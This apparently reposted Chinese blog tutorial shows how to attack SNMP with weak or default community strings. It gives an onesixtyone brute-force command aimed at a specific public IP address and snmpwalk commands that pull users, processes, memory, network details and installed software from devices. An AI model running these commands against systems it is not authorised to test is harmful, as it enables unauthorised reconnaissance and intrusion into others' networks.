码迷,mamicode.com
首页 > 其他好文 > 详细

snmap弱口令攻击利用

时间:2019-07-22 18:19:01      阅读:199      评论:0      收藏:0      [点我收藏+]

标签:pwa   存在   hubs   交换机   协议   重要   sys   window   路由   

科普Snmap:

  简单网络管理协议(SNMP) 是专门设计用于在 IP 网络管理网络节点(服务器、工作站、路由器、交换机及HUBS等)的一种标准协议,它是一种应用层协议。具体废话就不多说了,自己百度去。默认端口号是:161


如果能获取只读(RO)或读/写(RW)权限的团体字符串,将对你从设备中提取信息发挥重要作用,

snmp v1 v2天生存在安全缺陷,snmp v3中添加了加密功能提供了更好的检查机制,增强了安全性为了获取管理一台交换机的权限,首先你需要找到它的SNMP团体字符串。 

团体字符串默认为:public

如果你不知道目标团体字符串

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 58.215.76.23 -o my.log -w 100

显示对方团体字符串为 public

技术图片 

查看onesixtyone 目录

dpkg -L onesixtyone

技术图片

查看自带密码目录,你也可以使用自己的字典

 cat /usr/share/doc/onesixtyone/dict.txt

 技术图片



snmpwalk -c public -v 1  ip .1.3.6.1.2.1.25.1 得到取得windows端的系统进程用户数等

snmpwalk -c public -v 1 ip .1.3.6.1.2.1.25.2.2 取得系统总内存

snmpwalk -c public -v 1  ip hrSystemNumUsers 取得系统用户数

snmpwalk -c public -v 1  ip .1.3.6.1.2.1.4.20 取得IP信息

snmpwalk -v 2c -c public ip .1.3.6.1.2.1.1 查看系统信息

其中-v是指版本,-c 是指密钥。

snmpwalk功能很多,可以获取系统各种信息,只要更改后面的信息类型即可。如果不知道什么类型,也可以不指定,这样所有系统信息都获取到:

常用:snmpwalk -v 2c -c public 10.0.1.52

另外常用的

.1.3.6.1.4.1.77.1.4.1.0  列出域名
.1.3.6.1.2.1.25.6.3.1.2  列出安装的软件

.1.3.6.1.2.1.25.4.2.1.2  列出系统进程 

展示一波成功的案例:

技术图片

 

 

snmap弱口令攻击利用

标签:pwa   存在   hubs   交换机   协议   重要   sys   window   路由   

原文地址:https://www.cnblogs.com/nul1/p/11227265.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!